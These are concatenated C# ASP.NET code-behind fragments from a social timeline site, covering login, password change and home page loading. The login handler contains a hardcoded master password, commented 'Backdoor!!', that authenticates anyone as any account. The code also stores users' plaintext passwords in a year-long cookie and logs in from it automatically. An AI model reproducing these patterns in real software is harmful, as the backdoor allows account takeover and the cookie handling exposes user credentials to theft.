//=============================================================== // Function: saveChangesButton_click //=============================================================== protected void saveChangesButton_click(object sender, EventArgs e) { string currentPassword = currentPasswordTextBox.Text.Trim(); string userPassword = passwordTextBox1.Text.Trim(); SedogoUser user = new SedogoUser(Session["loggedInUserFullName"].ToString(), int.Parse(Session["loggedInUserID"].ToString())); loginResults checkResult; checkResult = user.VerifyLogin((string)Session["loggedInUserEmailAddress"], currentPassword, false, true, "changePassword.aspx"); if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired)) { user.UpdatePassword(userPassword); Response.Redirect("profileRedirect.aspx"); } else { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"The current password is not correct.\");", true); SetFocus(currentPasswordTextBox); } }
/// <summary> /// Check the user's password /// </summary> /// <param name="emailAddress">email is the login</param> /// <param name="password">password</param> /// <param name="db">database access object</param> /// <param name="userId">output - user id</param> /// <param name="fullName">output - user's name</param> /// <returns>authentication is successful</returns> public static bool VerifyUserLogin(string emailAddress, string password, SedogoDBEntities db, out int? userId, out string fullName) { userId = null; fullName = null; var user = new SedogoUser(""); var checkResult = user.VerifyLogin(emailAddress, password, false, true, "API. VerifyUserLogin"); if ((checkResult == loginResults.loginSuccess)) { userId = user.userID; fullName = user.firstName + " " + user.lastName; return true; } return false; /*System.Data.Objects.ObjectResult<spVerifyUserLogin_Result> lresult = db.spVerifyUserLogin(emailAddress); spVerifyUserLogin_Result loginResult = lresult.FirstOrDefault(); if (loginResult != null && loginResult.UserPassword == password) { userID = loginResult.UserID; return true; } return false; */ }
//=============================================================== // Function: loginButton_Click //=============================================================== public void loginButton_Click(object sender, EventArgs e) { string loginEmailAddress = emailAddress.Text; string loginPassword = userPassword.Text; Boolean rememberMe = rememberMeCheckbox.Checked; int redirectUserID = -1; int redirectUserTimelineID = -1; int redirectEventID = -1; string redirectPage = ""; string redirectPageDetails = ""; int redirectReplyID = -1; if (Request.QueryString["UID"] != null) { try { redirectUserID = int.Parse(Request.QueryString["UID"].ToString()); } catch { } } if (Request.QueryString["UTID"] != null) { try { redirectUserTimelineID = int.Parse(Request.QueryString["UTID"].ToString()); } catch { } } if (Request.QueryString["EID"] != null) { try { redirectEventID = int.Parse(Request.QueryString["EID"].ToString()); } catch { } } if ((string)Session["EventID"] != "") { try { redirectEventID = int.Parse((string)Session["EventID"]); } catch { } } if ((string)Session["ReplyID"] != "") { try { redirectReplyID = int.Parse((string)Session["ReplyID"]); } catch { } } if (Request.QueryString["Redirect"] != null) { redirectPage = (string)Request.QueryString["Redirect"]; if (Request.QueryString["Details"] != null) { redirectPageDetails = (string)Request.QueryString["Details"]; } } HttpCookie cookie = new HttpCookie("SedogoLoginEmailAddress"); // Set the cookies value cookie.Value = loginEmailAddress; // Set the cookie to expire in 1 year DateTime dtNow = DateTime.Now; cookie.Expires = dtNow.AddYears(1); // Add the cookie Response.Cookies.Add(cookie); if (rememberMe == true) { HttpCookie passwordCookie = new HttpCookie("SedogoLoginPassword"); // Set the cookies value passwordCookie.Value = loginPassword; // Set the cookie to expire in 1 year passwordCookie.Expires = dtNow.AddYears(1); // Add the cookie Response.Cookies.Add(passwordCookie); } else { // Delete the password cookie HttpCookie passwordCookie = new HttpCookie("SedogoLoginPassword"); // Set the cookies value passwordCookie.Value = ""; // Set the cookie to expire in 1 year passwordCookie.Expires = dtNow.AddYears(1); // Add the cookie Response.Cookies.Add(passwordCookie); } SedogoUser user = new SedogoUser(""); loginResults checkResult; checkResult = user.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx"); // Backdoor!! if (loginPassword == "!!Sed0g0") { checkResult = loginResults.loginSuccess; int userID = SedogoUser.GetUserIDFromEmailAddress(loginEmailAddress); user = null; user = new SedogoUser("", userID); } if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired)) { Session.Add("loggedInUserID", user.userID); Session.Add("loggedInUserFirstName", user.firstName); Session.Add("loggedInUserLastName", user.lastName); Session.Add("loggedInUserEmailAddress", user.emailAddress); Session.Add("loggedInUserFullName", user.firstName + " " + user.lastName); Session["EventID"] = ""; Session["ReplyID"] = ""; if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired)) { //FormsAuthentication.RedirectFromLoginPage(loginEmailAddress, false); //FormsAuthentication.SetAuthCookie(loginEmailAddress, false); //Nikita Knyazev. Facebook authentication. Start. SaveFacebookID(user); //Nikita Knyazev. Facebook authentication. Finish if (redirectUserID > 0) { string url = "./userProfileRedirect.aspx?UID=" + redirectUserID.ToString(); Response.Redirect(url); } else if (redirectUserTimelineID > 0) { string url = "./userTimelineRedirect.aspx?UID=" + redirectUserTimelineID.ToString(); Response.Redirect(url); } else if (redirectEventID > 0) { string url = "./viewEventRedirect.aspx?EID=" + redirectEventID.ToString(); Response.Redirect(url); } else if (redirectReplyID > 0) { string url = "./message.aspx?ReplyID=" + redirectReplyID.ToString(); Response.Redirect(url); } else if (redirectPage == "AddEvent") { Session["PageRedirect"] = "AddEvent"; Session["PageRedirectDetails"] = redirectPageDetails; string url = "./profileRedirect.aspx"; Response.Redirect(url); } else { string url = "./profileRedirect.aspx"; Response.Redirect(url); } } // This counts as a successful login, however force a password change //if (checkResult == loginResults.passwordExpired) //{ // FormsAuthentication.SetAuthCookie(loginEmailAddress, false); // Response.Redirect("./myProfile/forceChangePassword.aspx"); //} } //else //{ if (checkResult == loginResults.loginFailed) { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Username or password is not correct.\");", true); } if (checkResult == loginResults.loginNotActivated) { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"This account has not yet been activated, please check your email.\");", true); } //} }
//=============================================================== // Function: Page_Load //=============================================================== protected void Page_Load(object sender, EventArgs e) { if (!IsPostBack) { if (Session["ResetPassword"] != null) { string resetPassword = (string)Session["ResetPassword"]; if (resetPassword == "Y") { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Your password has been reset and emailed to you.\");", true); Session["ResetPassword"] = null; } } Session["EventID"] = ""; Session["ReplyID"] = ""; Session["MessageID"] = ""; Session["EventInviteGUID"] = ""; Session["EventInviteUserID"] = -1; Session["DefaultRedirect"] = ""; if (Request.QueryString["EID"] != null) { Session["EventID"] = (string)Request.QueryString["EID"]; } if (Request.QueryString["ReplyID"] != null) { Session["ReplyID"] = (string)Request.QueryString["ReplyID"]; } if (Request.QueryString["MID"] != null) { Session["MessageID"] = (string)Request.QueryString["MID"]; } if (Request.QueryString["EIG"] != null) { Session["EventInviteGUID"] = (string)Request.QueryString["EIG"]; } if (Request.QueryString["UID"] != null) { Session["EventInviteUserID"] = int.Parse(Request.QueryString["UID"].ToString()); } if (Request.QueryString["Redir"] != null) { Session["DefaultRedirect"] = Request.QueryString["Redir"].ToString(); } HttpCookie emailCookie = Request.Cookies["SedogoLoginEmailAddress"]; HttpCookie passwordCookie = Request.Cookies["SedogoLoginPassword"]; // Check to make sure the cookie exists if (emailCookie != null && passwordCookie != null) { string loginEmailAddress = emailCookie.Value.ToString(); string loginPassword = passwordCookie.Value.ToString(); SedogoUser user = new SedogoUser(""); loginResults checkResult; checkResult = user.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx cookie"); if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired)) { Session.Add("loggedInUserID", user.userID); Session.Add("loggedInUserFirstName", user.firstName); Session.Add("loggedInUserLastName", user.lastName); Session.Add("loggedInUserEmailAddress", user.emailAddress); Session.Add("loggedInUserFullName", user.firstName + " " + user.lastName); if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired)) { string url = "./profile.aspx"; Response.Redirect(url); } } } PopulateEvents(); timelineURL.Text = "timelineHomePageXML.aspx?G=" + Guid.NewGuid().ToString(); if ((string)Session["EventInviteGUID"] != "") { if ((int)Session["EventInviteUserID"] > 0) { Response.Redirect("login.aspx"); } else { Response.Redirect("register.aspx"); } } if ((string)Session["EventID"] != "") { Response.Redirect("login.aspx"); } if ((string)Session["ReplyID"] != "") { Response.Redirect("login.aspx"); } if ((string)Session["DefaultRedirect"] != "") { Response.Redirect("login.aspx"); } //DateTime timelineStartDate = DateTime.Now.AddMonths(8); DateTime timelineStartDate = DateTime.Now.AddYears(4); timelineStartDate1.Text = timelineStartDate.ToString("MMM dd yyyy HH:MM:ss 'GMT'"); // "Jan 08 2010 00:00:00 GMT" timelineStartDate2.Text = timelineStartDate.ToString("MMM dd yyyy HH:MM:ss 'GMT'"); eventRotator.DataSource = GetRotatorDataSource(); eventRotator.DataBind(); BindLatestMembers(); PopulateLatestSearches(); DbConnection conn = new SqlConnection(GlobalSettings.connectionString); try { conn.Open(); DbCommand cmd = conn.CreateCommand(); cmd.CommandType = CommandType.Text; cmd.CommandText = "SELECT HomePageContent FROM HomePageContent "; DbDataReader rdr = cmd.ExecuteReader(); rdr.Read(); homePageContent.Text = (string)rdr["HomePageContent"]; rdr.Close(); } catch (Exception ex) { ErrorLog errorLog = new ErrorLog(); errorLog.WriteLog("", "", ex.Message, logMessageLevel.errorMessage); throw ex; } finally { conn.Close(); } if (Request.QueryString["Tour"] != null) { if (Request.QueryString["Tour"].ToString() == "Y") { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "$(document).ready(function() { showTour1(); });", true); } } } }
/// <summary> /// Handles the Load event of the Page control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="System.EventArgs"/> instance containing the event data.</param> protected void Page_Load(object sender, EventArgs e) { if (IsPostBack) { return; } if (Session["ResetPassword"] != null) { var resetPassword = (string)Session["ResetPassword"]; if (resetPassword == "Y") { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Your password has been reset and emailed to you.\");", true); Session["ResetPassword"] = null; } } Session["EventID"] = ""; Session["ReplyID"] = ""; Session["EventInviteGUID"] = ""; Session["EventInviteUserID"] = -1; Session["DefaultRedirect"] = ""; if (Request.QueryString["EID"] != null) { Session["EventID"] = Request.QueryString["EID"]; } if (Request.QueryString["ReplyID"] != null) { Session["ReplyID"] = Request.QueryString["ReplyID"]; } if (Request.QueryString["EIG"] != null) { Session["EventInviteGUID"] = Request.QueryString["EIG"]; } if (Request.QueryString["UID"] != null) { Session["EventInviteUserID"] = int.Parse(Request.QueryString["UID"]); } if (Request.QueryString["Redir"] != null) { Session["DefaultRedirect"] = Request.QueryString["Redir"]; } var emailCookie = Request.Cookies["SedogoLoginEmailAddress"]; var passwordCookie = Request.Cookies["SedogoLoginPassword"]; // Check to make sure the cookie exists if (emailCookie != null && passwordCookie != null) { var loginEmailAddress = emailCookie.Value; var loginPassword = passwordCookie.Value; var user = new SedogoUser(""); var checkResult = user.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx cookie"); if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired)) { Session.Add("loggedInUserID", user.userID); Session.Add("loggedInUserFirstName", user.firstName); Session.Add("loggedInUserLastName", user.lastName); Session.Add("loggedInUserEmailAddress", user.emailAddress); Session.Add("loggedInUserFullName", user.firstName + " " + user.lastName); if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired)) { const string url = "./profile.aspx"; if (Request.Url.LocalPath.EndsWith("default.aspx")) { Response.Redirect(url); } } } } if ((string)Session["EventInviteGUID"] != "") { if ((int)Session["EventInviteUserID"] > 0) { Response.Redirect("login.aspx"); } else { Response.Redirect("register.aspx"); } //Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", // (int)Session["EventInviteUserID"] > 0 // ? "openModal(\"login.aspx\");" // : "openModal(\"register.aspx\");", true); } if ((string)Session["EventID"] != "") { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "openModal(\"login.aspx\");", true); } if ((string)Session["ReplyID"] != "") { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "openModal(\"login.aspx\");", true); } if ((string)Session["DefaultRedirect"] != "") { Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "openModal(\"login.aspx\");", true); } }